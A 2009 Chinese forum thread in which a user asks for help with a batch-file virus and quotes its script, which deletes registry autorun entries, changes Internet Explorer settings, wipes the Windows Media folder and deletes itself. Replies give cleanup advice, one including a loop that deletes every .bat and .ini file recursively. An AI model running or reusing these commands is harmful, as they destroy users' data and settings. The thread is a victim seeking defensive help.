|
ednykissyou
初级用户
积分 182
发帖 88
注册 2005-11-29
状态 离线
|
『楼 主』:
救我急等!重装系统无用:有黑心贼用批处理写的病毒
当我一开机,我的机子上就会先运行一个批处理文件,一闪而过,然后机子就感到明显的慢,如果我的机子刚好直接接到互联网上的话,我的输入法就会一闪一闪的,很明显有人把我当肉机替他干活啦,我重做了系统也不管用。我现在就不敢插网线!
我在C盘rogram Files下发现五六个批处理文件,看起来就很怪,文件名是HVPJDJ、2REQOYN、3JF3D1HZ、6NHKWGC3MZR、IBCCGT399,还有360也监测到这些文件名.lnK格式的程序要写入“启动项”。我用编辑的方形打开这些批处理,写着的是以下的东西(另附三个这样的文件在附件):另外我的U盘图标也尽然变成了文件夹图标:
S8VRADGPQ5MAHCZFQ
regsvr32.exe /s jscript.dll
ML3AI83XDNC7J
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
6FE1R3J1FDUY3W2970M
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Background_Sounds /t REG_SZ /d no /F
1J4LHXN7H60QXZX
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Animations /t REG_SZ /d no /F
W7RRQ9PJRUJMJNP6QTKJN
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Videos" /t REG_SZ /d no /F
T0XEV3MPCG9DJ3UYM
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Images" /t REG_SZ /d yes /F
OT4GTFMM3TC1W3O
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Disable Script Debugger" /t REG_SZ /d yes /F
INY7J0XKQQJJH6TSEYY
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v DisableScriptDebuggerIE /t REG_SZ /d yes /F
FGBLS9X1PS7CZZF5O
del C:\WINDOWS\Media\*.*
93WTMK5DDM00OM9M
del %0
exit
AIAA43V3VR79OD
附件
1:  黑贼的脚本.rar (2009-1-19 14:07, 2.96 K,下载次数: 34)
|
|
 2009-1-19 14:07 |
|
|
pkto
初级用户
积分 62
发帖 62
注册 2007-7-14
状态 离线
|
『第
2 楼』:
看以上情形,楼主应该先查清病毒来源,然后再考虑对付病毒。一般来说,有以下来源,请楼主对应查一下:
1、安装的系统盘本身带毒;
2、楼主的U盘不干净,建议先在其它机子上查一下,并且删除U盘上的可疑文件;
3、安装完系统后,不要急着使用,先打开其它分区(用招标右键打开,不要双击,避免再次感染),然后遍历分区,查出所有可能的bat和脚本(js或者ini等),然后一一清除;
4、确认一切OK后,安装杀毒软件、防火墙、升级补丁。
提供一个遍历删除的批处理:
for /r %%i in (.) do (
del "%%i\*.bat"
del "%%i\*.ini"
)
|
|
|
2009-1-19 14:30 |
|
|
windows4dos
新手上路
积分 18
发帖 9
注册 2009-1-16
状态 离线
|
『第
3 楼』:
第一时间先清理进程!
只是删除病毒文件没用的!一般都有保护,删了又会生成的!
给个方案:
进入WinPE系统,安装杀软检查,然后重装系统,安装系统完成后先不要运行其它盘的文件,特别是EXE,COM等高危文件!很可能它们已被感染!正确的方法是设置显示隐藏文件,删除所有可疑文件,再尽量从压缩的备份中解压出来使用,这样可以安全些,杀软方面自己找找,找个强些的,应该可以杀到,另推荐几个工具
Autoruns 冰刃 SREng 狙剑 网幽工具
|
Windows For DOS |
|
|
2009-1-19 15:00 |
|
|
luckboy45
中级用户
积分 487
发帖 212
注册 2007-4-1
状态 离线
|
|
|
2009-1-19 17:22 |
|
|
cad55
高级用户
积分 620
发帖 329
注册 2007-12-5
状态 离线
|
『第
5 楼』:
在DOS下重新分区
暂时不用,U盘,等自认为安全的工具, 重装新系统。。
应不会出现楼主所说的这样问题。
|
|
|
2009-1-20 10:13 |
|
|
netbenton
银牌会员
批处理编程迷
积分 1916
发帖 752
注册 2008-12-28
来自 广西
状态 离线
|
『第
6 楼』:
用安全的光盘启动,
重写主引导,用ghost安装系统,设置好防火墙后,安装杀素软件,开启实时监控,马上升级杀毒软件,打补丁,再对其它分区全盘扫描
[ Last edited by netbenton on 2009-1-20 at 12:37 ]
|
精简
[你的+我的+他的]=>[大家的] 个人 网志  |
|
|
2009-1-20 12:36 |
|
|
yishanju
银牌会员
[b]看你妹啊[/b]
积分 1488
发帖 1357
注册 2006-5-20
状态 离线
|
『第
7 楼』:
用启动盘进DOS ,删除所有盘下的AUTORUN.INF 和关联的可执行文件,然后重装系统
装个MAXDOS ,启动时选择进DOS 删除所有盘下的AUTORUN.INF 和关联的可执行文件,然后重装系统
|
有问题请发论坛或者自行搜索,再短消息问我的统统是SB |
|
|
2009-1-20 15:44 |
|
|
313885174
中级用户
积分 206
发帖 100
注册 2007-7-9
状态 离线
|
『第
8 楼』:
我想问下没行的代码表示什么?\
比如:S8VRADGPQ5MAHCZFQ
|
|
|
2009-1-20 20:24 |
|
|
yishanju
银牌会员
[b]看你妹啊[/b]
积分 1488
发帖 1357
注册 2006-5-20
状态 离线
|
『第
9 楼』:
....
很明显是恶意文件的名字
|
有问题请发论坛或者自行搜索,再短消息问我的统统是SB |
|
|
2009-1-21 01:36 |
|
